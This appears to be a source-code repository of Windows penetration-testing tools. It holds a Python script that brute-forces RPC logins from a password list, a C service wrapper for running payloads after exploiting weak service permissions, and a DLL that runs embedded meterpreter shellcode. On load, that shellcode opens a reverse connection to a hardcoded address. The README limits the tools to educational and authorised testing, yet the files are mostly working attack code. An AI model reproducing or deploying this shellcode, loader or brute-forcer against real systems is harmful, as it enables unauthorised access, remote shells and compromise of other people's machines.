├── README.md ├── msrpc-brute.py ├── PwnService.c └── meterdll.c /README.md: -------------------------------------------------------------------------------- 1 | ## PwnService 2 | A service wrapper for running payloads when exploiting Windows services weak permissions without being terminated by the SCM. This is needed if we don't want to create additional processes and run only from within the service process. 3 | You can modify the SERVICE_NAME macro and add your code to the payload function. 4 | It might also be necessary to add some control event processing to the service handler. 5 | 6 | 7 | ## MeterDLL 8 | A DLL wrapping of meterpreter. 9 | Can be further improved to include forwarded exports depending on the DLL one wants to spoof. 10 | 11 | 12 | ## MSRPC-brute 13 | Automation of [winexe](https://sourceforge.net/projects/winexe/) for bruteforcing access to Windows RPC (IPC$ share).
14 | Please note that even if you have the correct admin credentials you might still not have access due to [UAC remote restrictions](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows). 15 | 16 | ## Disclaimer 17 | These tools are made only for educational purposes and can be only used in legitimate penetration tests. Author does not take any responsibility for any actions taken by its users. 18 | -------------------------------------------------------------------------------- /msrpc-brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import subprocess as sb 4 | import sys 5 | 6 | success=False 7 | 8 | def connect_to_target(target,user,password): 9 | 10 | global success 11 | null = open("/dev/null","w") 12 | cmd = ['winexe',"-U"+user+"%"+password, r"//"+target, "tasklist" ] 13 | ret = sb.call(cmd, stdout=null,stderr=sb.STDOUT) 14 | if ret == 0: 15 | print "\033[1;32m[+] Connected to host "+target+" with credentials : "+user+":"+password 16 | success=True 17 | null.close() 18 | 19 | if __name__ == "__main__": 20 | 21 | if len(sys.argv) != 4: 22 | print "[*] Usage : "+sys.argv[0]+" " 23 | sys.exit(1) 24 | 25 | 26 | password_file=open(sys.argv[3]) 27 | 28 | for line in password_file.readlines(): 29 | password = line.strip() 30 | connect_to_target(sys.argv[1],sys.argv[2],password) 31 | if(success): 32 | break 33 | 34 | if(not(success)): 35 | print "\033[1;31m[-] Could not brute-force login.\033[m" 36 | 37 | password_file.close() 38 | 39 | -------------------------------------------------------------------------------- /PwnService.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define SERVICE_NAME "PWNED" 5 | 6 | void WINAPI PwnedServiceCtrlHandler(DWORD opcode); 7 | void PwnedServiceStart(DWORD argc, LPTSTR *argv); 8 | DWORD InvokePayload(void); 9 | 10 | 11 | SERVICE_STATUS PwnedServiceStatus; 12 | SERVICE_STATUS_HANDLE PwnedServiceStatusHandle; 13 | HANDLE Stop_Event; 14 | 15 | 16 | int main(int argc, char **argv) 17 | { 18 | SERVICE_TABLE_ENTRYA DispatchTable[] = { 19 | {SERVICE_NAME , (LPSERVICE_MAIN_FUNCTIONA)PwnedServiceStart}, 20 | {NULL , NULL} 21 | }; 22 | 23 | if(!StartServiceCtrlDispatcherA(DispatchTable)) 24 | return EXIT_FAILURE; 25 | 26 | return EXIT_SUCCESS; 27 | } 28 | 29 | 30 | void PwnedServiceStart(DWORD argc, LPTSTR *argv) 31 | { 32 | PwnedServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS; 33 | PwnedServiceStatus.dwCurrentState = SERVICE_START_PENDING; 34 | PwnedServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; 35 | PwnedServiceStatus.dwWin32ExitCode = 0; 36 | PwnedServiceStatus.dwServiceSpecificExitCode = 0; 37 | PwnedServiceStatus.dwCheckPoint = 0; 38 | PwnedServiceStatus.dwWaitHint = 0; 39 | 40 | PwnedServiceStatusHandle = RegisterServiceCtrlHandlerA(SERVICE_NAME, PwnedServiceCtrlHandler); 41 | PwnedServiceStatus.dwCurrentState = SERVICE_RUNNING; 42 | PwnedServiceStatus.dwCheckPoint = 0; 43 | PwnedServiceStatus.dwWaitHint = 0; 44 | SetServiceStatus(PwnedServiceStatusHandle, &PwnedServiceStatus); 45 | 46 | InvokePayload(); // this might need to be invoked as a separate thread 47 | 48 | return; 49 | } 50 | 51 | void WINAPI PwnedServiceCtrlHandler(DWORD opcode) 52 | { 53 | 54 | switch(opcode){ 55 | 56 | case SERVICE_CONTROL_STOP: 57 | 58 | // clean-up .... 59 | PwnedServiceStatus.dwCurrentState = SERVICE_STOPPED; 60 | PwnedServiceStatus.dwWaitHint = 0; 61 | PwnedServiceStatus.dwCheckPoint = 0; 62 | PwnedServiceStatus.dwWin32ExitCode = 0; 63 | SetServiceStatus(PwnedServiceStatusHandle, &PwnedServiceStatus); 64 | 65 | break; 66 | 67 | // more controls can be implemented here 68 | } 69 | 70 | return; 71 | } 72 | 73 | 74 | 75 | 76 | 77 | DWORD InvokePayload(void) 78 | { 79 | // add your payload here 80 | } 81 | -------------------------------------------------------------------------------- /meterdll.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | // meterpreter payload 6 | UCHAR shellcd[] = 7 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 8 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 9 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 10 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 11 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 12 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 13 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 14 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 15 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 16 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 17 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 18 | "\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xac\x10\xbc\xa0\x68\x02" 19 | "\x00\x01\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" 20 | "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" 21 | "\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00" 22 | "\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83" 23 | "\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a" 24 | "\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57" 25 | "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00" 26 | "\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68" 27 | "\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff" 28 | "\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" 29 | "\x53\xff\xd5"; 30 | 31 | DWORD WINAPI start_shellcode(LPVOID lpParameter); 32 | 33 | // entry point invoked when loading DLL 34 | BOOL APIENTRY DllMain( HMODULE hModule, 35 | DWORD ul_reason_for_call, 36 | LPVOID lpReserved 37 | ) 38 | { 39 | if(ul_reason_for_call == DLL_PROCESS_ATTACH){ 40 | // We need to create another thread, otherwise the calling thread will block forever 41 | // This might not work giving the way Windows handles the loader lock 42 | // as long as our shellcode does not invoke LoadLibrary (direct or indrect call) it should work. 43 | CreateThread(NULL, 0, start_shellcode , NULL, 0, NULL); 44 | 45 | } 46 | return TRUE; 47 | } 48 | 49 | DWORD WINAPI start_shellcode(LPVOID lpParameter){ 50 | 51 | DWORD oldprotect; 52 | DWORD (*shellcode)(void); 53 | void *p; 54 | HANDLE heapp = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof(shellcd), 2*sizeof(shellcd)); 55 | if (heapp == NULL) 56 | return GetLastError(); 57 | p = HeapAlloc(heapp, 0, sizeof(shellcd)); 58 | if (p == NULL) 59 | return GetLastError(); 60 | 61 | memcpy(p,shellcd, sizeof(shellcd)); 62 | VirtualProtect(p, sizeof(shellcd), PAGE_EXECUTE_READWRITE, &oldprotect); 63 | shellcode = (DWORD (*)(void))p; 64 | return shellcode(); 65 | 66 | 67 | } 68 | 69 | 70 | --------------------------------------------------------------------------------